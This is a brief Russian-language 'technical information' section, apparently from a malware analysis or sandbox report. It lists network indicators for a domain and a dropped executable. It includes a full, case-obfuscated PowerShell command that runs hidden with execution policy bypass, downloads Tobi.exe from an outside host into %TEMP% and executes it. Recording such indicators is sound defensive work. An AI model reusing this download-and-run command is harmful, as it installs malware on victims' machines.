Техническая информация
- http://baxx.us/tobi.exe как %temp%\\batch.exe
- '<SYSTEM32>\cmd.exe' /c pOWERShell.exe -wIndOWstylE hidDEN -nopRofilE -exeCutIONpOlICy bYpASS (NeW-OBjeCt SystEM.NeT.WEbCliENt).DOWnlOadFilE('http://baxx.us/Tobi.exe','%TEMP%\\Batch.exe') & %TEMP%\\Batch.exe
- 'ba#x.us':80
- 'ba#x.us':443
- http://ba#x.us/Tobi.exe
- 'ba#x.us':443
- DNS ASK ba#x.us